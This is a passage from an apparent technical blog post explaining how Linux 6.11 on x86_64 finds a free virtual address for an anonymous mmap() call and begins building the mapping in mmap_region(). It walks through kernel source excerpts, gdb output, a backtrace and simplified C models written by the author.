</span></span><span class="line"><span class="cl">			  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">addr0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">vm_unmapped_area_info</span> <span class="n">info</span> <span class="o">=</span> <span class="p">{};</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">MAP_FIXED</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></p>
<p>If <code>MAP_FIXED</code> is set, <code>addr</code> is returned as-is, no questions asked.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">addr</span> <span class="o">&amp;=</span> <span class="n">PAGE_MASK</span><span class="p">;</span>                              <span class="p">[</span><span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">mmap_address_hint_valid</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">))</span>        <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">			<span class="k">goto</span> <span class="n">get_unmapped_area</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">vma</span> <span class="o">=</span> <span class="nf">find_vma</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="n">addr</span><span class="p">);</span>                       <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">vma</span> <span class="o">||</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">len</span> <span class="o">&lt;=</span> <span class="nf">vm_start_gap</span><span class="p">(</span><span class="n">vma</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>                            <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></p>
<p>If a hint is set (i.e. <code>addr != 0</code>) then the function will check if that address range is free. It first makes sure the <code>addr</code> is page aligned [0] and then performs <em>another</em> validation check on it [1]. The comment for <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/mmap.c#L209"><code>mmap_address_hint_valid()</code></a> does a good job describing why this check is needed!</p>
<p>To check if the address range our new mapping will use is free, it calls <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2014"><code>find_vma()</code></a> [2] - this function returns the first memory region in our <code>mm</code> that ends above <code>addr</code>, i.e. the one containing <code>addr</code> or, failing that, the next one AFTER it. If no mapping is returned (<code>!vma</code>) then the address space after <code>addr</code> is free and we&rsquo;re good to go.</p>
<p>However, if there is a mapping somewhere at or after <code>addr</code>, we need to make sure it starts at or AFTER the end of our new mapping. It does this by comparing where our new mapping will end (<code>addr + len</code>) and the start address of the <code>vma</code> (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3513"><code>vm_start_gap(vma)</code></a>; the <code>gap</code> part is because the function factors in any potential padding). If there&rsquo;s no overlap, our mapping&rsquo;s area is unmapped and we can use the hint! [3]</p>
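<p>To make the hint check a bit more concrete, here&rsquo;s a toy userspace model of steps [2] and [3]. Everything in it is an assumption for illustration: the VMAs live in a sorted array instead of a maple tree, the <code>sk_</code> names are made up, and the guard gap handled by <code>vm_start_gap()</code> is ignored.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Toy VMA: covers the half-open range [start, end). */
struct sk_vma {
	unsigned long start;
	unsigned long end;
};

/* Model of find_vma(): first VMA (in ascending order) with addr < end. */
const struct sk_vma *sk_find_vma(const struct sk_vma *vmas, size_t n,
				 unsigned long addr)
{
	for (size_t i = 0; i < n; i++)
		if (addr < vmas[i].end)
			return &vmas[i];
	return NULL;
}

/* Can [addr, addr + len) be used as-is, without touching any VMA? */
int sk_hint_is_free(const struct sk_vma *vmas, size_t n,
		    unsigned long addr, unsigned long len)
{
	const struct sk_vma *vma = sk_find_vma(vmas, n, addr);

	/* Nothing at or above addr, or the next VMA starts past our end. */
	return !vma || addr + len <= vma->start;
}
```

<p>Note that a hint landing inside an existing VMA fails the second condition automatically, because that VMA&rsquo;s start is below <code>addr</code> and therefore below <code>addr + len</code>.</p>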
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">vm_unmapped_area_info</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">;</span>        <span class="c1">// informs search behaviour
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">length</span><span class="p">;</span>       <span class="c1">// length of the mapping in bytes
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">low_limit</span><span class="p">;</span>    <span class="c1">// lowest vaddr to start at
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">high_limit</span><span class="p">;</span>   <span class="c1">// highest vaddr to end at
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">align_mask</span><span class="p">;</span>   <span class="c1">// alignment mask the addr must satisfy
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">align_offset</span><span class="p">;</span> <span class="c1">// offset applied before align_mask
</span></span></span><span class="line"><span class="cl">	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">start_gap</span><span class="p">;</span>    <span class="c1">// minimum gap required before mapping
</span></span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443">include/linux/mm.h</a></p>
<p>If the hint isn&rsquo;t valid or overlaps an existing mapping, the function will proceed to the <code>get_unmapped_area</code> label, where it populates a <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L3443"><code>struct vm_unmapped_area_info</code></a> describing the properties and constraints of our new mapping.</p>
<p>Remember, as we&rsquo;re searching topdown, <code>high_limit</code> defines the start point (base) for our search. So how is this calculated? By default, the function will use the value that is handily stored in <code>mm-&gt;mmap_base</code> (the base user vaddr for topdown allocations). But what is this?</p>
<p><img src="https://sam4k.com/content/images/2025/04/image.png" alt=""></p>
<p>From <a href="https://www.slideshare.net/slideshow/process-address-space-the-way-to-create-virtual-address-page-table-of-userspace-application-251425396/251425396#3">these slides</a> by Adrian Huang</p>
<p>Let&rsquo;s remind ourselves of the x86_64 process virtual address space. We can see that <code>mm-&gt;mmap_base</code> sits at the upper end of the address space, just below the stack (and its guard gap). This diagram is the &ldquo;canonical&rdquo; address space and assumes the typical 47 bits (out of the 64, on a 64-bit system) are used for user virtual addresses.</p>
<p>However, more bits may be used for the virtual address on some systems. So while the implementation defaults to <code>mmap_base</code> as the <code>high_limit</code>, if the hint is outside of this window, then the <code>high_limit</code> will instead be raised towards the true upper bound of the user virtual address space (where <code>TASK_SIZE_MAX</code> defines the size of the user virtual address space).</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="n">info</span><span class="p">.</span><span class="n">high_limit</span> <span class="o">=</span> <span class="nf">get_mmap_base</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * If hint address is above DEFAULT_MAP_WINDOW, look for unmapped area
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * in the full address space.
</span></span></span><span class="line"><span class="cl"><span class="cm">	 *
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * !in_32bit_syscall() check to avoid high addresses for x32
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * (and make it no op on native i386).
</span></span></span><span class="line"><span class="cl"><span class="cm">	 */</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">addr</span> <span class="o">&gt;</span> <span class="n">DEFAULT_MAP_WINDOW</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="nf">in_32bit_syscall</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">		<span class="n">info</span><span class="p">.</span><span class="n">high_limit</span> <span class="o">+=</span> <span class="n">TASK_SIZE_MAX</span> <span class="o">-</span> <span class="n">DEFAULT_MAP_WINDOW</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161">arch/x86/kernel/sys_x86_64.c</a></p>
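<p>Here&rsquo;s that <code>high_limit</code> adjustment as standalone arithmetic. Treat it as a sketch under assumptions: the <code>sk_</code> names are mine, the number of virtual address bits is passed in as a parameter (47 with 4-level paging, 56 with 5-level paging, to my understanding), the window constant mirrors how I read <code>DEFAULT_MAP_WINDOW</code> on x86_64, and the <code>in_32bit_syscall()</code> check is left out.</p>

```c
#include <assert.h>

#define SK_PAGE_SIZE          0x1000UL
#define SK_DEFAULT_MAP_WINDOW ((1UL << 47) - SK_PAGE_SIZE)

/* Size of the user address space for a given number of virtual bits. */
unsigned long sk_task_size_max(unsigned int virt_bits)
{
	assert(virt_bits < 64);
	return (1UL << virt_bits) - SK_PAGE_SIZE;
}

/* Start at mmap_base; only widen the search if the hint asks for it. */
unsigned long sk_high_limit(unsigned long mmap_base, unsigned long hint,
			    unsigned int virt_bits)
{
	unsigned long high_limit = mmap_base;

	if (hint > SK_DEFAULT_MAP_WINDOW)
		high_limit += sk_task_size_max(virt_bits) - SK_DEFAULT_MAP_WINDOW;
	return high_limit;
}
```

<p>With 47 virtual bits the adjustment is zero, so the branch is effectively a no-op; it only matters when the address space is wider than the default window <em>and</em> the caller passes a hint above it. Our hint of <code>0</code> never takes the branch.</p>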
<p>The <code>info</code> structure is then passed to <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1765"><code>vm_unmapped_area(&amp;info)</code></a> which will do the search. As we specify <code>VM_UNMAPPED_AREA_TOPDOWN</code> in <code>info.flags</code>, it uses the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714"><code>unmapped_area_topdown(info)</code></a> implementation.</p>
<p>Using the magic of gdb, we can set a breakpoint to examine the <code>info</code> structure for our program&rsquo;s mapping to make sure everything aligns with our understanding:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) p/x *((struct vm_unmapped_area_info*)info)
</span></span><span class="line"><span class="cl">$2 = {
</span></span><span class="line"><span class="cl">  flags = VM_UNMAPPED_AREA_TOPDOWN, 
</span></span><span class="line"><span class="cl">  length = 0x1000,                  // our mapping len
</span></span><span class="line"><span class="cl">  low_limit = 0x1000,               // default low_limit
</span></span><span class="line"><span class="cl">  high_limit = 0x7f4bc62a3000,      // mmap_base (highest bit set is 47)
</span></span><span class="line"><span class="cl">  align_mask = 0x0, 
</span></span><span class="line"><span class="cl">  align_offset = 0x0, 
</span></span><span class="line"><span class="cl">  start_gap = 0x0
</span></span><span class="line"><span class="cl">}
</span></span></code></pre></div><p>Now <code>unmapped_area_topdown()</code> has all the information it needs to search the address space from <code>high_limit</code> to <code>low_limit</code>, looking for a gap that fits our mapping of <code>len</code> (taking into account any alignment or gaps required before the mapping):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
</span></span><span class="line"><span class="cl">{
</span></span><span class="line"><span class="cl">	// SNIP
</span></span><span class="line"><span class="cl">	VMA_ITERATOR(vmi, current-&gt;mm, 0);
</span></span><span class="line"><span class="cl">		
</span></span><span class="line"><span class="cl">	// SNIP
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	if (vma_iter_area_highest(&amp;vmi, low_limit, high_limit, length))
</span></span><span class="line"><span class="cl">		return -ENOMEM;
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	gap = vma_iter_end(&amp;vmi) - info-&gt;length;
</span></span><span class="line"><span class="cl">	gap -= (gap - info-&gt;align_offset) &amp; info-&gt;align_mask;
</span></span><span class="line"><span class="cl">	gap_end = vma_iter_end(&amp;vmi);
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1714">mm/mmap.c</a></p>
<p>Remember those maple trees we spoke about at the beginning? Well now it&rsquo;s all going to come in handy! <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L1114"><code>VMA_ITERATOR()</code></a> is a macro used to initialise an iterator, <code>vmi</code>, for iterating (!) the vmas of a process (our <code>current-&gt;mm</code> in this case).</p>
<p>The main logic is then handled by the handy <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1411"><code>vma_iter_area_highest()</code></a>. This function wraps the advanced maple tree API, <code>mas_empty_area_rev()</code>, to find the highest gap (i.e. a range not spanned by a node/vma) of <code>length</code> bytes, working from <code>high_limit</code> down to <code>low_limit</code>. And just like that we&rsquo;ve done our topdown search!</p>
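<p>To get a feel for what the topdown search is doing, here&rsquo;s a toy version in plain C. It is a model, not the kernel&rsquo;s algorithm: a sorted array stands in for the maple tree, a linear scan stands in for <code>mas_empty_area_rev()</code>, the <code>td_</code> names are made up, <code>start_gap</code> and the stack guard retry are ignored, and (as I understand the kernel does) the search over-asks by <code>align_mask</code> so that aligning down still fits in the gap.</p>

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

struct td_vma {                 /* toy VMA covering [start, end) */
	unsigned long start, end;
};

struct td_info {                /* subset of vm_unmapped_area_info */
	unsigned long length, low_limit, high_limit;
	unsigned long align_mask, align_offset;
};

#define TD_ENOMEM ((unsigned long)-ENOMEM)

/* vmas must be sorted by address and non-overlapping. */
unsigned long td_unmapped_area_topdown(const struct td_vma *vmas, size_t n,
				       const struct td_info *info)
{
	unsigned long need = info->length + info->align_mask;
	unsigned long gap_end = info->high_limit;
	size_t i = n;

	for (;;) {
		unsigned long gap_start = info->low_limit;

		/* Skip VMAs that sit entirely at or above the current window. */
		while (i > 0 && vmas[i - 1].start >= gap_end)
			i--;
		/* The gap's floor is the next VMA down, or low_limit. */
		if (i > 0 && vmas[i - 1].end > gap_start)
			gap_start = vmas[i - 1].end;

		if (gap_start < gap_end && gap_end - gap_start >= need) {
			/* Place the mapping at the top of the gap, then align. */
			unsigned long addr = gap_end - info->length;

			addr -= (addr - info->align_offset) & info->align_mask;
			return addr;
		}
		if (i == 0)
			return TD_ENOMEM;

		/* Too small: continue the search below this VMA. */
		if (vmas[i - 1].start < gap_end)
			gap_end = vmas[i - 1].start;
		i--;
		if (gap_end <= info->low_limit)
			return TD_ENOMEM;
	}
}
```

<p>Feeding it the <code>info</code> values from the gdb dump above (<code>length = 0x1000</code>, <code>low_limit = 0x1000</code>, <code>high_limit = 0x7f4bc62a3000</code>) with nothing mapped near the top hands back <code>0x7f4bc62a2000</code>, the page directly below <code>high_limit</code>. If a VMA already occupies that spot, the search slides down to the next gap below it.</p>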
<p>There are then some additional checks to make sure it conforms with the supplied <code>info</code> plus some additional error cases but that&rsquo;s the general gist of it. We did it! That&rsquo;s how we find an unused virtual address for our mapping &hellip; at least for the default topdown case on an x86_64 system &hellip;</p>
<p>For context, this is where we are in the callstack at this point:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">#0  0xffffffff81243e86 in unmapped_area_topdown (info=&lt;optimized out&gt;) at mm/mmap.c:1719
</span></span><span class="line"><span class="cl">#1  vm_unmapped_area (info=info@entry=0xffffc900004b7d80) at mm/mmap.c:1770
</span></span><span class="line"><span class="cl">#2  0xffffffff81037ce5 in arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, 
</span></span><span class="line"><span class="cl">    vm_flags=&lt;optimized out&gt;) at arch/x86/kernel/sys_x86_64.c:219
</span></span><span class="line"><span class="cl">#3  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
</span></span><span class="line"><span class="cl">    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
</span></span><span class="line"><span class="cl">#4  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:937
</span></span><span class="line"><span class="cl">#5  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:926
</span></span><span class="line"><span class="cl">#6  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
</span></span><span class="line"><span class="cl">#7  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc900004b7ee8, uf=0xffffc900004b7ef0)
</span></span><span class="line"><span class="cl">    at mm/mmap.c:1325
</span></span><span class="line"><span class="cl">#8  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
</span></span><span class="line"><span class="cl">#9  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
</span></span><span class="line"><span class="cl">#10 do_syscall_64 (regs=0xffffc900004b7f58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
</span></span></code></pre></div><p>We&rsquo;re going to head back up to <code>do_mmap()</code> and cover the final bit of logic for the mapping process: <code>mmap_region()</code>.</p>
<h3 id="mmapregion"><code>mmap_region()</code></h3>
<p><img src="https://sam4k.com/content/images/2025/04/this_is_it.gif" alt=""></p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">	addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1468">mm/mmap.c</a></p>
<p>Okay! Can you believe we&rsquo;re still on the first system call of our &ldquo;simple&rdquo; program?! There&rsquo;s not long left now though! We&rsquo;re back in <code>do_mmap()</code> and the pieces are set:</p>
<ul>
<li><code>file</code> is NULL as we&rsquo;re mapping anonymous memory, not a file, in our address space</li>
<li><code>addr</code>, as we&rsquo;ve just painstakingly discovered, now contains a suitable virtual address for our mapping</li>
<li><code>len</code> is the length of our mapping in bytes</li>
<li><code>vm_flags</code> has been populated in <code>do_mmap()</code> from a combination of the <code>prot</code> and <code>flags</code> we passed to <code>mmap()</code> as well as the <code>mm-&gt;def_flags</code></li>
<li><code>pgoff</code> is zero, right? hah, well &hellip; for anonymous <code>MAP_PRIVATE</code> mappings, <code>do_mmap()</code> will set <code>pgoff = addr &gt;&gt; PAGE_SHIFT;</code>. But <code>pgoff</code> is for file offsets, and we&rsquo;re not mapping a file?! The tl;dr here is this acts as an identifier for anonymous vmas (I&rsquo;m sure we&rsquo;ll touch on this later).</li>
<li><code>uf</code>, the userfault list stuff, is still untouched and probably still out of scope for the post</li>
</ul>
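<p>If you want to sanity check the numbers showing up in the backtraces in this section, here&rsquo;s a rough sketch that recomputes them. The <code>VM_*</code> values are copied by hand from <code>include/linux/mm.h</code> (so treat them as assumptions), the helper names are mine, and the flag logic is heavily simplified: it ignores <code>mm-&gt;def_flags</code>, pkeys and any bits derived from the <code>MAP_*</code> flags.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;sys/mman.h&gt;

#define PAGE_SHIFT	12	/* 4 KiB pages on x86_64 */

/* Bit values mirrored from include/linux/mm.h (assumed, not included). */
#define VM_READ		0x01UL
#define VM_WRITE	0x02UL
#define VM_EXEC		0x04UL
#define VM_MAYREAD	0x10UL
#define VM_MAYWRITE	0x20UL
#define VM_MAYEXEC	0x40UL

/* Simplified take on how do_mmap() turns prot into vm_flags. */
unsigned long sketch_vm_flags(int prot)
{
	/* A plain mapping starts with all of the VM_MAY* bits set. */
	unsigned long vm_flags = VM_MAYREAD | VM_MAYWRITE | VM_MAYEXEC;

	if (prot &amp; PROT_READ)
		vm_flags |= VM_READ;
	if (prot &amp; PROT_WRITE)
		vm_flags |= VM_WRITE;
	if (prot &amp; PROT_EXEC)
		vm_flags |= VM_EXEC;
	return vm_flags;
}

/* For anonymous MAP_PRIVATE mappings, pgoff is the page number of addr. */
unsigned long sketch_anon_pgoff(unsigned long addr)
{
	return addr &gt;&gt; PAGE_SHIFT;
}
</code></pre></div><p>Passing <code>PROT_READ | PROT_WRITE</code> gives <code>115</code> (<code>0x73</code>), which matches the <code>vm_flags=115</code> in the backtraces. Likewise, shifting the <code>addr=140379443372032</code> seen in the <code>mmap_region()</code> backtrace right by 12 gives <code>34272325042</code>, the exact <code>pgoff</code> it was called with.</p>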
<p>Now we&rsquo;re ready to jump into <code>mmap_region()</code>! The goal of this function is to do the actual &ldquo;mapping&rdquo; part of <code>mmap()</code>, which essentially means making sure our mapping (<code>len</code> bytes at <code>addr</code> with <code>vm_flags</code> properties) is represented by a <code>struct vm_area_struct</code> and stored in the <code>mm-&gt;mm_mt</code>. Sounds simple enough, right?</p>
<p>Well &hellip; as you might expect, there are a lot of cases, edge cases and validation that needs to be done to do this correctly. For now we&rsquo;ll continue to focus on those relating specifically to anonymous mappings and our case study.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">unsigned long mmap_region(struct file *file, unsigned long addr,
</span></span><span class="line"><span class="cl">		unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
</span></span><span class="line"><span class="cl">		struct list_head *uf)
</span></span><span class="line"><span class="cl">{
</span></span><span class="line"><span class="cl">	struct mm_struct *mm = current-&gt;mm;
</span></span><span class="line"><span class="cl">	struct vm_area_struct *vma = NULL;
</span></span><span class="line"><span class="cl">	struct vm_area_struct *next, *prev, *merge;
</span></span><span class="line"><span class="cl">// SNIP
</span></span><span class="line"><span class="cl">	VMA_ITERATOR(vmi, mm, addr);
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Right off the bat we can see the <code>VMA_ITERATOR()</code> macro again, which will be doing a lot of heavy lifting in this function for navigating the <code>mm-&gt;mm_mt</code> maple tree. Note that it&rsquo;s initialised with our <code>addr</code>, so the iterator starts with <code>addr</code> as its index.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">	/* Check against address space limit. */
</span></span><span class="line"><span class="cl">	if (!may_expand_vm(mm, vm_flags, len &gt;&gt; PAGE_SHIFT)) {
</span></span><span class="line"><span class="cl">		unsigned long nr_pages;
</span></span><span class="line"><span class="cl">		// SNIP     
</span></span><span class="line"><span class="cl">	}
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	/* Unmap any existing mapping in the area */
</span></span><span class="line"><span class="cl">	error = do_vmi_munmap(&amp;vmi, mm, addr, len, uf, false);
</span></span><span class="line"><span class="cl">	// SNIP
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Next we do some housekeeping. First is a check to make sure &ldquo;the calling process may expand its vm space by the passed number of pages&rdquo; (<code>len &gt;&gt; PAGE_SHIFT</code> is a quick way to convert <code>len</code> bytes to the page count equivalent). This involves checking against any resource limits.</p>
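<p>As a rough sketch of that check, assuming we only care about the address space limit (<code>RLIMIT_AS</code>): as I read it, the real <code>may_expand_vm()</code> also checks <code>RLIMIT_DATA</code> for data mappings, which I&rsquo;ve left out. <code>struct mm_sketch</code> and the helpers below are hypothetical, not kernel API.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdbool.h&gt;

#define PAGE_SHIFT	12	/* 4 KiB pages on x86_64 */

/* Hypothetical, trimmed-down view of the accounting involved. */
struct mm_sketch {
	unsigned long total_vm;	/* pages currently mapped */
	unsigned long as_limit;	/* RLIMIT_AS, in bytes */
};

/* len is already page aligned by the time we get here. */
static unsigned long bytes_to_pages(unsigned long len)
{
	return len &gt;&gt; PAGE_SHIFT;
}

/* Would mapping another len bytes keep us within the limit? */
bool sketch_may_expand_vm(const struct mm_sketch *mm, unsigned long len)
{
	return mm-&gt;total_vm + bytes_to_pages(len) &lt;=
	       bytes_to_pages(mm-&gt;as_limit);
}
</code></pre></div><p>Both sides of the comparison are in pages, which is why <code>mmap_region()</code> passes <code>len &gt;&gt; PAGE_SHIFT</code> rather than <code>len</code> itself.</p>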
<p>Then, we hit a quirk of <code>MAP_FIXED</code> behaviour we touched on earlier. Notably, when looking for an unmapped area, by default we&rsquo;ll get an <code>addr</code> that does not overlap any existing mappings for <code>len</code> bytes. However, if <code>MAP_FIXED</code> is passed, it will just use the <code>addr</code> passed by the user (as long as it&rsquo;s valid), regardless of overlaps.</p>
<p>If it does overlap any existing mappings, these will get unmapped. This behaviour is implemented by <code>do_vmi_munmap()</code>, which uses the vma iterator to unmap whatever existing mappings overlap <code>addr</code> to <code>addr + len</code>. Note mappings can be &ldquo;sealed&rdquo;<a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">[2]</a> and can&rsquo;t be unmapped like this, causing the current <code>mmap()</code> to fail.</p>
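<p>You can see this replacing behaviour from userspace. The snippet below is a small sketch (the function name is my own) that maps a page, scribbles on it, then maps over the same address with <code>MAP_FIXED</code> and checks that the old contents are gone.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#define _DEFAULT_SOURCE
#include &lt;string.h&gt;
#include &lt;sys/mman.h&gt;

/*
 * Returns 1 if a MAP_FIXED mapping placed over an existing one replaced
 * it (same address, fresh zeroed page), 0 if not, -1 if mmap() failed.
 */
int map_fixed_replaces_existing(void)
{
	const size_t len = 0x1000;
	char *old, *fresh;
	int replaced;

	old = mmap(NULL, len, PROT_READ | PROT_WRITE,
		   MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	if (old == MAP_FAILED)
		return -1;
	memset(old, 'A', len);

	/* Same address, but this time we insist on it with MAP_FIXED. */
	fresh = mmap(old, len, PROT_READ | PROT_WRITE,
		     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
	if (fresh == MAP_FAILED) {
		munmap(old, len);
		return -1;
	}

	/* The page full of 'A's was unmapped; we now read a zero page. */
	replaced = (fresh == old &amp;&amp; fresh[0] == 0);
	munmap(fresh, len);
	return replaced;
}
</code></pre></div><p>On a typical Linux system this should return <code>1</code>: the second <code>mmap()</code> silently unmapped the first mapping before creating the new one in its place.</p>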
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="n">next</span> <span class="o">=</span> <span class="nf">vma_next</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">);</span>
